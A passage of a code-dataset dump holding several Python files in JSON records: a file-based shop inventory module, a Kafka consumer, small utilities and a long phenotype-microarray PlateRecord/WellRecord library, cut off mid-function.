parameterset = ParameterSet.extract_from(values)\n return parameterset._replace(values=trim_items(parameterset.values, keep_index))\n\n # Generate the new values\n argnames = f(argnames)\n argvalues = list(map(f, argvalues))\n return argnames, argvalues\n","repo_name":"ManageIQ/integration_tests","sub_path":"cfme/utils/pytest_shortcuts.py","file_name":"pytest_shortcuts.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"77"} +{"seq_id":"4635509569","text":"import os\nimport json\n\ncurrent_path = os.getcwd()\nproducts_file_path = os.path.join(current_path, 'DB', 'products.txt')\nusers_file_path = os.path.join(current_path, \"DB\", \"users.txt\")\nimage_files_dir_path = os.path.join(current_path, \"DB\", \"Images\")\n\n\ndef get_products_content(page_id, sign):\n products = []\n current_products = []\n with open(products_file_path, 'r') as file:\n for line in file.read().split('\\n'):\n if line:\n product = json.loads(line)\n product = {k: os.path.join(image_files_dir_path, v) if k == \"img_path\" else v\n for k, v in product.items()}\n\n if sign == '<' and product['quantity'] > 0:\n continue\n elif sign == '>' and product['quantity'] <= 0:\n continue\n\n current_products.append(product)\n if len(current_products) == 14:\n products.append(current_products.copy())\n current_products.clear()\n\n if current_products:\n products.append(current_products)\n\n if len(products) >= page_id + 1:\n return products[page_id]\n return []\n\n\ndef reduce_product_quantity(product_id):\n products = []\n with open(products_file_path, 'r+') as file:\n for line in [line for line in file.read().split('\\n') if line]:\n line = json.loads(line)\n if line['id'] == product_id:\n if line['quantity'] <= 0:\n return line['id']\n\n line['quantity'] -= line['doze'] if line['quantity'] >= line['doze'] else line['quantity']\n\n products.append(line)\n\n file.truncate(0)\n file.seek(0)\n for line in products:\n file.write(json.dumps(line))\n file.write(f\"\\n\")\n\n\ndef add_product_to_user_products(current_user, product_id, now):\n users = []\n with open(users_file_path, 'r+') as file:\n for line in file.read().split('\\n'):\n if line:\n user = json.loads(line)\n users.append(user)\n\n file.truncate(0)\n file.seek(0)\n\n for user in users:\n if user['username'] == current_user:\n user['sold_products'].append((product_id, now))\n\n file.write(json.dumps(user))\n file.write('\\n')\n\n\ndef add_product_to_inventory(product):\n error = []\n product = {k: v.get() for k, v in product.items()}\n mapper = {\n \"name\": \"product name\",\n \"taste\": \"product taste\",\n \"quantity\": \"product quantity\",\n \"img_path\": \"image path\",\n \"price\": \"product price\",\n \"unit\": \"selling unit\",\n \"doze\": \"selling doze\",\n }\n\n for k, v in product.items():\n if not v:\n error.append(f\"Enter {mapper[k]}!\")\n continue\n\n if k == \"img_path\":\n if v not in os.listdir(image_files_dir_path):\n error.append(f'Image \"{product[k]}\" does not exist in ..DB/Images!')\n\n elif k == \"quantity\" or k == \"price\" or k == \"doze\":\n try:\n product[k] = float(v)\n if product[k] < 0:\n raise ValueError\n except ValueError:\n error.append(f\"{mapper[k]} must be a positive integer!\")\n\n elif k == \"unit\":\n units = ['gr', 'kg', 'ml', 'count']\n\n if v not in units:\n error.append(f\"Product unit must be one of: {', '.join(units)}\")\n\n if not error:\n with open(products_file_path, 'r+') as file:\n next_id = len(file.read().split('\\n'))\n product.update({\"id\": next_id})\n file.write(json.dumps(product))\n file.write(\"\\n\")\n\n return '\\n'.join(error)\n\n\ndef increase_product_quantity(product_id, quantity):\n products = []\n is_found = False\n error = []\n if not product_id:\n error.append(f\"Enter product name!\")\n if not quantity:\n error.append(f\"Enter product quantity!\")\n\n if error:\n return '\\n'.join(error)\n\n with open(products_file_path, 'r+') as file:\n for line in [line for line in file.read().split('\\n') if line]:\n line = json.loads(line)\n if product_id == line['id']:\n is_found = True\n try:\n quantity = int(quantity)\n if quantity < 0:\n raise ValueError\n line['quantity'] += int(quantity)\n except ValueError:\n error.append(f\"Product quantity must be a positive integer!\")\n break\n\n products.append(line)\n\n if not is_found:\n error.append(f\"Product not found!\")\n\n if error:\n return '\\n'.join(error)\n\n file.truncate(0)\n file.seek(0)\n for line in products:\n file.write(json.dumps(line))\n file.write('\\n')\n","repo_name":"4um3n/SoftUni-Courses","sub_path":"Python-Advanced/Modules/Exercises/GUI-Shop/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"74783684409","text":"import Bio.Phylo as bp\nimport cPickle as pkl\nwith open('data/accessions.pkl') as pkl_file:\n accessions = pkl.load(pkl_file)\n\ntree = bp.read('data/picoides_geo.newick','newick')\ntree.root_at_midpoint()\nfor terminal in tree.get_terminals():\n if terminal.name in accessions:\n terminal.name = accessions[terminal.name][0]\n \nbp._utils.draw_ascii(tree)\n","repo_name":"bendmorris/picoides-phylogeography","sub_path":"draw_tree.py","file_name":"draw_tree.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30766129218","text":"import sys\r\nfrom collections import defaultdict\r\n\r\ninput = sys.stdin.readline\r\n\r\n\r\ntc = int(input())\r\nfor _ in range(tc):\r\n n = int(input())\r\n counts = defaultdict(int)\r\n for _ in range(n):\r\n _, c = input().split()\r\n counts[c] += 1\r\n for c in counts:\r\n counts[c] += 1\r\n\r\n answer = 1\r\n for c in counts:\r\n answer *= counts[c]\r\n\r\n print(answer - 1)","repo_name":"ng-lee/ProblemSolving","sub_path":"백준/Silver/9375. 패션왕 신해빈/패션왕 신해빈.py","file_name":"패션왕 신해빈.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38305911317","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nScript Name: \nAuthor: Do Trinh/Jimmy - 3D artist.\n\nDescription:\n\n\n\"\"\"\n# -------------------------------------------------------------------------------------------------------------\n\nfrom urllib import parse\nfrom cgi import parse_header\nfrom pyPLM.Core import Url, FileInfo\n\n\ndef filenameFromHeader(header):\n value, params = parse_header(header)\n if 'filename*' in params:\n filename = params['filename*']\n if filename.startswith(\"UTF-8''\"):\n filename = parse.unquote(filename[7:])\n elif 'filename' in params:\n filename = params['filename']\n else:\n filename = ''\n return filename\n\n\ndef filenameFromUrl(addr):\n link = Url.fromUserInput(addr)\n link.setFragment(None)\n link = Url.toString(Url.RemoveQuery)\n return FileInfo(parse.unquote_plus(link)).fileName()\n\n\n\n# -------------------------------------------------------------------------------------------------------------\n# Created by Trinh Do on 5/6/2020 - 3:13 AM\n# © 2017 - 2020 DAMGteam. All rights reserved","repo_name":"vtta2008/PLM","sub_path":"PLM/utils/nets.py","file_name":"nets.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"876398710","text":"\"\"\"\nThis module defines the SaveFileInfo class\n\"\"\"\nfrom app.utils.difficulty import Difficulty\nfrom app.utils.upgrade import Upgrade\n\n\nclass SaveFileInfo:\n \"\"\"\n This class contains all the information that is needed to be saved when saving the game\n \"\"\"\n def __init__(self, round_number: int, difficulty: Difficulty, player_health: int, upgrades: list[Upgrade], best_score: int):\n \"\"\"\n Constructor for the SaveFileInfo class\n :param round_number: Number of the current round\n :param difficulty: Difficulty chosen by the player\n :param player_health: Current number of player's health points\n :param upgrades: Upgrades chosen by the player in the game\n :param best_score: Best score achieved in the game\n \"\"\"\n self.round_number: int = round_number\n self.difficulty: Difficulty = difficulty\n self.player_health: int = player_health\n self.upgrades: list[Upgrade] = upgrades\n self.best_score: int = best_score\n","repo_name":"Mogula99/Defender","sub_path":"app/src/savefilemanager/save_file_info.py","file_name":"save_file_info.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8123309772","text":"import orjson\nfrom aiokafka import AIOKafkaConsumer\nfrom functools import wraps\nfrom pydantic import ValidationError\n\nfrom app.db.session import async_session\nfrom app.settings import KAFKA_URI\nfrom app.settings import logger\nfrom app.tp_kafka import handlers\nfrom app.utils.base_schema import BaseSchema\n\n\nconsumer = AIOKafkaConsumer(\"user\", bootstrap_servers=KAFKA_URI)\n\n\nasync def consume():\n await consumer.start() \n try:\n async for msg in consumer:\n if msg.topic == \"user\":\n await handlers.upsert_user(msg.value)\n finally:\n logger.info(\"consumer stopped\")\n await consumer.stop()\n\n\ndef topic_msg_decode(schema: BaseSchema):\n def wrap(func):\n @wraps(func)\n async def wrapped(msg_bytes: bytes, *args, **kwargs):\n try:\n msg_decoded = orjson.loads(msg_bytes.decode())\n msg = schema.validate(msg_decoded).dict()\n async with async_session() as get_db:\n response = await func(msg, get_db, *args, **kwargs)\n return response \n except ValidationError as error_message:\n logger.error(error_message)\n except Exception as error_message:\n logger.error(error_message) \n return wrapped\n return wrap","repo_name":"Sobolev5/ABC-Service","sub_path":"stats/app/tp_kafka/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31859027848","text":"import warnings\nimport json\nimport csv\nimport numpy as np\n\nfrom Bio import BiopythonParserWarning\n\n# Private csv headers - hardcoded because this are supposedly never changed\n_datafile = \"Data File\"\n_plate = \"Plate Type\"\n_strainType = \"Strain Type\"\n_sample = \"Sample Number\"\n_strainName = \"Strain Name\"\n_strainNumber = \"Strain Number\"\n_other = \"Other\"\n_hour = \"Hour\"\n_file = \"File\"\n_position = \"Position\"\n_setupTime = \"Setup Time\"\n\n_platesPrefix = \"PM\"\n_platesPrefixMammalian = \"PM-M\"\n#\n\n# Json identifiers - hardcoded as they are set by the creators of opm\n_csvData = \"csv_data\"\n_measurements = \"measurements\"\n#\n\n\nclass PlateRecord:\n \"\"\"PlateRecord object for storing Phenotype Microarray plates data.\n\n A PlateRecord stores all the wells of a particular phenotype\n Microarray plate, along with metadata (if any). The single wells can be\n accessed calling their id as an index or iterating on the PlateRecord:\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> well = plate['A05']\n >>> for well in plate:\n ... print(well.id)\n ...\n A01\n ...\n\n The plate rows and columns can be queried with an indexing system similar\n to NumPy and other matrices:\n\n >>> print(plate[1])\n Plate ID: PM01\n Well: 12\n Rows: 1\n Columns: 12\n PlateRecord('WellRecord['B01'], WellRecord['B02'], WellRecord['B03'], ..., WellRecord['B12']')\n\n >>> print(plate[:,1])\n Plate ID: PM01\n Well: 8\n Rows: 8\n Columns: 1\n PlateRecord('WellRecord['A02'], WellRecord['B02'], WellRecord['C02'], ..., WellRecord['H02']')\n\n Single WellRecord objects can be accessed using this indexing system:\n\n >>> print(plate[1,2])\n Plate ID: PM01\n Well ID: B03\n Time points: 384\n Minum signal 0.00 at time 11.00\n Maximum signal 76.25 at time 18.00\n WellRecord('(0.0, 11.0), (0.25, 11.0), (0.5, 11.0), (0.75, 11.0), (1.0, 11.0), ..., (95.75, 11.0)')\n\n The presence of a particular well can be inspected with the \"in\" keyword:\n >>> 'A01' in plate\n True\n\n All the wells belonging to a \"row\" (identified by the first character of\n the well id) in the plate can be obtained:\n\n >>> for well in plate.get_row('H'):\n ... print(well.id)\n ...\n H01\n H02\n H03\n ...\n\n All the wells belonging to a \"column\" (identified by the number of the well)\n in the plate can be obtained:\n\n >>> for well in plate.get_column(12):\n ... print(well.id)\n ...\n A12\n B12\n C12\n ...\n\n Two PlateRecord objects can be compared: if all their wells are equal the\n two plates are considered equal:\n\n >>> plate2 = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> plate == plate2\n True\n\n Two PlateRecord object can be summed up or subtracted from each other: the\n the signals of each well will be summed up or subtracted. The id of the\n left operand will be kept:\n\n >>> plate3 = plate + plate2\n >>> print(plate3.id)\n PM01\n\n Many Phenotype Microarray plate have a \"negative control\" well, which can\n be subtracted to all wells:\n\n >>> subplate = plate.subtract_control()\n\n \"\"\"\n\n def __init__(self, plateid, wells=None):\n \"\"\"Initialize the class.\"\"\"\n self.id = plateid\n\n if wells is None:\n wells = []\n\n # Similar behaviour as GenBank\n # Contains all the attributes\n self.qualifiers = {}\n\n # Well_id --> WellRecord objects\n self._wells = {}\n try:\n for w in wells:\n self._is_well(w)\n self[w.id] = w\n except TypeError:\n raise TypeError(\n \"You must provide an iterator-like object containing the single wells\"\n )\n\n self._update()\n\n def _update(self):\n \"\"\"Update the rows and columns string identifiers (PRIVATE).\"\"\"\n self._rows = sorted({x[0] for x in self._wells})\n self._columns = sorted({x[1:] for x in self._wells})\n\n def _is_well(self, obj):\n \"\"\"Check if the given object is a WellRecord object (PRIVATE).\n\n Used both for the class constructor and the __setitem__ method\n \"\"\"\n # Value should be of WellRecord type\n if not isinstance(obj, WellRecord):\n raise ValueError(\n f\"A WellRecord type object is needed as value (got {type(obj)})\"\n )\n\n def __getitem__(self, index):\n \"\"\"Access part of the plate.\n\n Depending on the indices, you can get a WellRecord object\n (representing a single well of the plate),\n or another plate\n (representing some part or all of the original plate).\n\n plate[wid] gives a WellRecord (if wid is a WellRecord id)\n plate[r,c] gives a WellRecord\n plate[r] gives a row as a PlateRecord\n plate[r,:] gives a row as a PlateRecord\n plate[:,c] gives a column as a PlateRecord\n\n plate[:] and plate[:,:] give a copy of the plate\n\n Anything else gives a subset of the original plate, e.g.\n plate[0:2] or plate[0:2,:] uses only row 0 and 1\n plate[:,1:3] uses only columns 1 and 2\n plate[0:2,1:3] uses only rows 0 & 1 and only cols 1 & 2\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n\n You can access a well of the plate, using its id.\n\n >>> w = plate['A01']\n\n You can access a row of the plate as a PlateRecord using an integer\n index:\n\n >>> first_row = plate[0]\n >>> print(first_row)\n Plate ID: PM01\n Well: 12\n Rows: 1\n Columns: 12\n PlateRecord('WellRecord['A01'], WellRecord['A02'], WellRecord['A03'], ..., WellRecord['A12']')\n >>> last_row = plate[-1]\n >>> print(last_row)\n Plate ID: PM01\n Well: 12\n Rows: 1\n Columns: 12\n PlateRecord('WellRecord['H01'], WellRecord['H02'], WellRecord['H03'], ..., WellRecord['H12']')\n\n You can also access use python's slice notation to sub-plates\n containing only some of the plate rows:\n\n >>> sub_plate = plate[2:5]\n >>> print(sub_plate)\n Plate ID: PM01\n Well: 36\n Rows: 3\n Columns: 12\n PlateRecord('WellRecord['C01'], WellRecord['C02'], WellRecord['C03'], ..., WellRecord['E12']')\n\n This includes support for a step, i.e. plate[start:end:step], which\n can be used to select every second row:\n\n >>> sub_plate = plate[::2]\n\n You can also use two indices to specify both rows and columns.\n Using simple integers gives you the single wells. e.g.\n\n >>> w = plate[3, 4]\n >>> print(w.id)\n D05\n\n To get a single column use this syntax:\n\n >>> sub_plate = plate[:, 4]\n >>> print(sub_plate)\n Plate ID: PM01\n Well: 8\n Rows: 8\n Columns: 1\n PlateRecord('WellRecord['A05'], WellRecord['B05'], WellRecord['C05'], ..., WellRecord['H05']')\n\n Or, to get part of a column,\n\n >>> sub_plate = plate[1:3, 4]\n >>> print(sub_plate)\n Plate ID: PM01\n Well: 2\n Rows: 2\n Columns: 1\n PlateRecord(WellRecord['B05'], WellRecord['C05'])\n\n However, in general you get a sub-plate,\n\n >>> print(plate[1:5, 3:6])\n Plate ID: PM01\n Well: 12\n Rows: 4\n Columns: 3\n PlateRecord('WellRecord['B04'], WellRecord['B05'], WellRecord['B06'], ..., WellRecord['E06']')\n\n This should all seem familiar to anyone who has used the NumPy\n array or matrix objects.\n \"\"\"\n # Well identifier access\n if isinstance(index, str):\n try:\n return self._wells[index]\n except KeyError:\n raise KeyError(f\"Well {index} not found!\")\n\n # Integer index\n elif isinstance(index, int):\n try:\n row = self._rows[index]\n except IndexError:\n raise IndexError(\"Row %d not found!\" % index)\n return PlateRecord(\n self.id, filter(lambda x: x.id.startswith(row), self._wells.values())\n )\n\n # Slice\n elif isinstance(index, slice):\n rows = self._rows[index]\n return PlateRecord(\n self.id, filter(lambda x: x.id[0] in rows, self._wells.values())\n )\n\n # Other access\n elif len(index) != 2:\n raise TypeError(\"Invalid index type.\")\n\n row_index, col_index = index\n if isinstance(row_index, int) and isinstance(col_index, int):\n # Return a single WellRecord\n try:\n row = self._rows[row_index]\n except IndexError:\n raise IndexError(\"Row %d not found!\" % row_index)\n try:\n col = self._columns[col_index]\n except IndexError:\n raise IndexError(\"Column %d not found!\" % col_index)\n\n return self._wells[row + col]\n\n elif isinstance(row_index, int):\n try:\n row = self._rows[row_index]\n except IndexError:\n raise IndexError(\"Row %d not found!\" % row_index)\n cols = self._columns[col_index]\n\n return PlateRecord(\n self.id,\n filter(\n lambda x: x.id.startswith(row) and x.id[1:] in cols,\n self._wells.values(),\n ),\n )\n\n elif isinstance(col_index, int):\n try:\n col = self._columns[col_index]\n except IndexError:\n raise IndexError(\"Columns %d not found!\" % col_index)\n rows = self._rows[row_index]\n\n return PlateRecord(\n self.id,\n filter(\n lambda x: x.id.endswith(col) and x.id[0] in rows,\n self._wells.values(),\n ),\n )\n\n else:\n rows = self._rows[row_index]\n cols = self._columns[col_index]\n\n return PlateRecord(\n self.id,\n filter(\n lambda x: x.id[0] in rows and x.id[1:] in cols, self._wells.values()\n ),\n )\n\n def __setitem__(self, key, value):\n if not isinstance(key, str):\n raise ValueError(\"Well identifier should be string-like\")\n self._is_well(value)\n # Provided key and well ID should be the same\n if value.id != key:\n raise ValueError(\n \"WellRecord ID and provided key are different (got '%s' and '%s')\"\n % (type(value.id), type(key))\n )\n self._wells[key] = value\n\n self._update()\n\n def __delitem__(self, key):\n if not isinstance(key, str):\n raise ValueError(\"Well identifier should be string-like\")\n del self._wells[key]\n\n self._update()\n\n def __iter__(self):\n for well in sorted(self._wells):\n yield self._wells[well]\n\n def __contains__(self, wellid):\n if wellid in self._wells:\n return True\n return False\n\n def __len__(self):\n \"\"\"Return the number of wells in this plate.\"\"\"\n return len(self._wells)\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self._wells == other._wells\n else:\n return False\n\n def __add__(self, plate):\n \"\"\"Add another PlateRecord object.\n\n The wells in both plates must be the same\n\n A new PlateRecord object is returned, having the same id as the\n left operand.\n \"\"\"\n if not isinstance(plate, PlateRecord):\n raise TypeError(\"Expecting a PlateRecord object\")\n\n if {x.id for x in self} != {x.id for x in plate}:\n raise ValueError(\"The two plates have different wells\")\n\n wells = []\n\n for w in self:\n wells.append(w + plate[w.id])\n\n newp = PlateRecord(self.id, wells=wells)\n\n return newp\n\n def __sub__(self, plate):\n \"\"\"Subtract another PlateRecord object.\n\n The wells in both plates must be the same\n\n A new PlateRecord object is returned, having the same id as the\n left operand.\n \"\"\"\n if not isinstance(plate, PlateRecord):\n raise TypeError(\"Expecting a PlateRecord object\")\n\n if {x.id for x in self} != {x.id for x in plate}:\n raise ValueError(\"The two plates have different wells\")\n\n wells = []\n\n for w in self:\n wells.append(w - plate[w.id])\n\n newp = PlateRecord(self.id, wells=wells)\n\n return newp\n\n def get_row(self, row):\n \"\"\"Get all the wells of a given row.\n\n A row is identified with a letter (e.g. 'A')\n \"\"\"\n # Key is casted to str implicitly\n try:\n row = str(row)\n except Exception:\n # Is it even possible to get an exception here?\n raise ValueError(\"Row identifier should be string-like\")\n if len(row) > 1:\n raise ValueError(\"Row identifier must be of maximum one letter\")\n\n for w in sorted(filter(lambda x: x.startswith(row), self._wells)):\n yield self._wells[w]\n\n def get_column(self, column):\n \"\"\"Get all the wells of a given column.\n\n A column is identified with a number (e.g. '6')\n \"\"\"\n # Column is casted to int implicitly\n try:\n column = int(column)\n except Exception:\n raise ValueError(\"Column identifier should be a number\")\n\n # A 96-well plate has well numbers in two digits\n for w in sorted(filter(lambda x: x.endswith(\"%02d\" % column), self._wells)):\n yield self._wells[w]\n\n def subtract_control(self, control=\"A01\", wells=None):\n \"\"\"Subtract a 'control' well from the other plates wells.\n\n By default the control is subtracted to all wells, unless\n a list of well ID is provided\n\n The control well should belong to the plate\n A new PlateRecord object is returned\n \"\"\"\n if control not in self:\n raise ValueError(\"Control well not present in plate\")\n wcontrol = self[control]\n\n if wells is None:\n wells = self._wells.keys()\n\n missing = {w for w in wells if w not in self}\n if missing:\n raise ValueError(\"Some wells to be subtracted are not present\")\n\n nwells = []\n\n for w in self:\n if w.id in wells:\n nwells.append(w - wcontrol)\n else:\n nwells.append(w)\n\n newp = PlateRecord(self.id, wells=nwells)\n\n return newp\n\n def __repr__(self):\n \"\"\"Return a (truncated) representation of the plate for debugging.\"\"\"\n if len(self._wells) > 4:\n # Show the last well and the first three\n return \"%s('%s, ..., %s')\" % (\n self.__class__.__name__,\n \", \".join(\n [\n \"%s['%s']\" % (self[x].__class__.__name__, self[x].id)\n for x in sorted(self._wells.keys())[:3]\n ]\n ),\n \"%s['%s']\"\n % (\n self[sorted(self._wells.keys())[-1]].__class__.__name__,\n self[sorted(self._wells.keys())[-1]].id,\n ),\n )\n else:\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \", \".join(\n [\n \"%s['%s']\" % (self[x].__class__.__name__, self[x].id)\n for x in sorted(self._wells.keys())\n ]\n ),\n )\n\n def __str__(self):\n \"\"\"Return a human readable summary of the record (string).\n\n The python built in function str works by calling the object's __str__\n method. e.g.\n\n >>> from Bio import phenotype\n >>> record = next(phenotype.parse(\"phenotype/Plates.csv\", \"pm-csv\"))\n >>> print(record)\n Plate ID: PM01\n Well: 96\n Rows: 8\n Columns: 12\n PlateRecord('WellRecord['A01'], WellRecord['A02'], WellRecord['A03'], ..., WellRecord['H12']')\n\n Note that long well lists are shown truncated.\n \"\"\"\n lines = []\n if self.id:\n lines.append(f\"Plate ID: {self.id}\")\n lines.append(\"Well: %i\" % len(self))\n # Here we assume that all well ID start with a char\n lines.append(\"Rows: %d\" % len({x.id[0] for x in self}))\n # Here we assume that well number is a two-digit number\n lines.append(\"Columns: %d\" % len({x.id[1:3] for x in self}))\n lines.append(repr(self))\n return \"\\n\".join(lines)\n\n\nclass WellRecord:\n \"\"\"WellRecord stores all time course signals of a phenotype Microarray well.\n\n The single time points and signals can be accessed iterating on the\n WellRecord or using lists indexes or slices:\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> well = plate['A05']\n >>> for time, signal in well:\n ... print(\"Time: %f, Signal: %f\" % (time, signal)) # doctest:+ELLIPSIS\n ...\n Time: 0.000000, Signal: 14.000000\n Time: 0.250000, Signal: 13.000000\n Time: 0.500000, Signal: 15.000000\n Time: 0.750000, Signal: 15.000000\n ...\n >>> well[1]\n 16.0\n >>> well[1:5]\n [16.0, 20.0, 18.0, 15.0]\n >>> well[1:5:0.5]\n [16.0, 19.0, 20.0, 18.0, 18.0, 18.0, 15.0, 18.0]\n\n If a time point was not present in the input file but it's between the\n minimum and maximum time point, the interpolated signal is returned,\n otherwise a nan value:\n\n >>> well[1.3]\n 19.0\n >>> well[1250]\n nan\n\n Two WellRecord objects can be compared: if their input time/signal pairs\n are exactly the same, the two records are considered equal:\n\n >>> well2 = plate['H12']\n >>> well == well2\n False\n\n Two WellRecord objects can be summed up or subtracted from each other: a new\n WellRecord object is returned, having the left operand id.\n\n >>> well1 = plate['A05']\n >>> well2 = well + well1\n >>> print(well2.id)\n A05\n\n If SciPy is installed, a sigmoid function can be fitted to the PM curve,\n in order to extract some parameters; three sigmoid functions are available:\n * gompertz\n * logistic\n * richards\n The functions are described in Zwietering et al., 1990 (PMID: 16348228)\n\n For example::\n\n well.fit()\n print(well.slope, well.model)\n (61.853516785566917, 'logistic')\n\n If not sigmoid function is specified, the first one that is successfully\n fitted is used. The user can also specify a specific function.\n\n To specify gompertz::\n\n well.fit('gompertz')\n print(well.slope, well.model)\n (127.94630059171354, 'gompertz')\n\n If no function can be fitted, the parameters are left as None, except for\n the max, min, average_height and area.\n \"\"\"\n\n def __init__(self, wellid, plate=None, signals=None):\n \"\"\"Initialize the class.\"\"\"\n if plate is None:\n self.plate = PlateRecord(None)\n else:\n self.plate = plate\n\n self.id = wellid\n\n # Curve parameters (to be calculated with the \"fit\" function)\n # Parameters that don't need scipy\n self.max = None\n self.min = None\n self.average_height = None\n\n # Parameters that need scipy\n self.area = None\n self.plateau = None\n self.slope = None\n self.lag = None\n self.v = None\n self.y0 = None\n self.model = None\n\n # Original signals (private)\n if signals is None:\n self._signals = {}\n else:\n self._signals = signals\n\n def _interpolate(self, time):\n \"\"\"Linear interpolation of the signals at certain time points (PRIVATE).\"\"\"\n times = sorted(self._signals.keys())\n\n return np.interp(\n time, times, [self._signals[x] for x in times], left=np.nan, right=np.nan\n )\n\n def __setitem__(self, time, signal):\n \"\"\"Assign a signal at a certain time point.\"\"\"\n try:\n time = float(time)\n except ValueError:\n raise ValueError(\"Time point should be a number\")\n try:\n signal = float(signal)\n except ValueError:\n raise ValueError(\"Signal should be a number\")\n\n self._signals[time] = signal\n\n def __getitem__(self, time):\n \"\"\"Return a subset of signals or a single signal.\"\"\"\n if isinstance(time, slice):\n # Fix the missing values in the slice\n if time.start is None:\n start = 0\n else:\n start = time.start\n\n if time.stop is None:\n stop = max(self.get_times())\n else:\n stop = time.stop\n\n time = np.arange(start, stop, time.step)\n return list(self._interpolate(time))\n\n elif isinstance(time, int) or isinstance(time, float):\n return self._interpolate(time)\n\n raise ValueError(\"Invalid index\")\n\n def __iter__(self):\n for time in sorted(self._signals.keys()):\n yield time, self._signals[time]\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n if list(self._signals.keys()) != list(other._signals.keys()):\n return False\n # Account for the presence of NaNs\n for k in self._signals:\n if np.isnan(self[k]) and np.isnan(other[k]):\n continue\n elif self[k] != other[k]:\n return False\n return True\n else:\n return False\n\n def __add__(self, well):\n \"\"\"Add another WellRecord object.\n\n A new WellRecord object is returned, having the same id as the\n left operand\n \"\"\"\n if not isinstance(well, WellRecord):\n raise TypeError(\"Expecting a WellRecord object\")\n\n signals = {}\n\n times = set(self._signals.keys()).union(set(well._signals.keys()))\n for t in sorted(times):\n signals[t] = self[t] + well[t]\n\n neww = WellRecord(self.id, signals=signals)\n\n return neww\n\n def __sub__(self, well):\n \"\"\"Subtract another WellRecord object.\n\n A new WellRecord object is returned, having the same id as the\n left operand\n \"\"\"\n if not isinstance(well, WellRecord):\n raise TypeError(\"Expecting a WellRecord object\")\n\n signals = {}\n\n times = set(self._signals.keys()).union(set(well._signals.keys()))\n for t in sorted(times):\n signals[t] = self[t] - well[t]\n\n neww = WellRecord(self.id, signals=signals)\n\n return neww\n\n def __len__(self):\n \"\"\"Return the number of time points sampled.\"\"\"\n return len(self._signals)\n\n def __repr__(self):\n \"\"\"Return a (truncated) representation of the signals for debugging.\"\"\"\n if len(self) > 7:\n # Shows the last time point and the first five\n return \"%s('%s, ..., %s')\" % (\n self.__class__.__name__,\n \", \".join([str(x) for x in self.get_raw()[:5]]),\n str(self.get_raw()[-1]),\n )\n else:\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \", \".join([str(x) for x in self.get_raw()]),\n )\n\n def __str__(self):\n \"\"\"Return a human readable summary of the record (string).\n\n The python built-in function str works by calling the object's __str__\n method. e.g.\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> record = plate['A05']\n >>> print(record)\n Plate ID: PM01\n Well ID: A05\n Time points: 384\n Minum signal 0.25 at time 13.00\n Maximum signal 19.50 at time 23.00\n WellRecord('(0.0, 14.0), (0.25, 13.0), (0.5, 15.0), (0.75, 15.0), (1.0, 16.0), ..., (95.75, 16.0)')\n\n Note that long time spans are shown truncated.\n \"\"\"\n lines = []\n if self.plate and self.plate.id:\n lines.append(f\"Plate ID: {self.plate.id}\")\n if self.id:\n lines.append(f\"Well ID: {self.id}\")\n lines.append(\"Time points: %i\" % len(self))\n lines.append(\"Minum signal %.2f at time %.2f\" % min(self, key=lambda x: x[1]))\n lines.append(\"Maximum signal %.2f at time %.2f\" % max(self, key=lambda x: x[1]))\n lines.append(repr(self))\n return \"\\n\".join(lines)\n\n def get_raw(self):\n \"\"\"Get a list of time/signal pairs.\"\"\"\n return [(t, self._signals[t]) for t in sorted(self._signals.keys())]\n\n def get_times(self):\n \"\"\"Get a list of the recorded time points.\"\"\"\n return sorted(self._signals.keys())\n\n def get_signals(self):\n \"\"\"Get a list of the recorded signals (ordered by collection time).\"\"\"\n return [self._signals[t] for t in sorted(self._signals.keys())]\n\n def fit(self, function=(\"gompertz\", \"logistic\", \"richards\")):\n \"\"\"Fit a sigmoid function to this well and extract curve parameters.\n\n If function is None or an empty tuple/list, then no fitting is done.\n Only the object's ``.min``, ``.max`` and ``.average_height`` are\n calculated.\n\n By default the following fitting functions will be used in order:\n - gompertz\n - logistic\n - richards\n\n The first function that is successfully fitted to the signals will\n be used to extract the curve parameters and update ``.area`` and\n ``.model``. If no function can be fitted an exception is raised.\n\n The function argument should be a tuple or list of any of these three\n function names as strings.\n\n There is no return value.\n \"\"\"\n avail_func = (\"gompertz\", \"logistic\", \"richards\")\n\n # Parameters not dependent on curve fitting\n self.max = max(self, key=lambda x: x[1])[1]\n self.min = min(self, key=lambda x: x[1])[1]\n\n self.average_height = np.array(self.get_signals()).mean()\n\n if not function:\n self.area = None\n self.model = None\n return\n for sigmoid_func in function:\n if sigmoid_func not in avail_func:\n raise ValueError(f\"Fitting function {sigmoid_func!r} not supported\")\n\n # Parameters that depend on scipy curve_fit\n from .pm_fitting import fit, get_area\n from .pm_fitting import logistic, gompertz, richards\n\n function_map = {\n \"logistic\": logistic,\n \"gompertz\": gompertz,\n \"richards\": richards,\n }\n\n self.area = get_area(self.get_signals(), self.get_times())\n\n self.model = None\n for sigmoid_func in function:\n func = 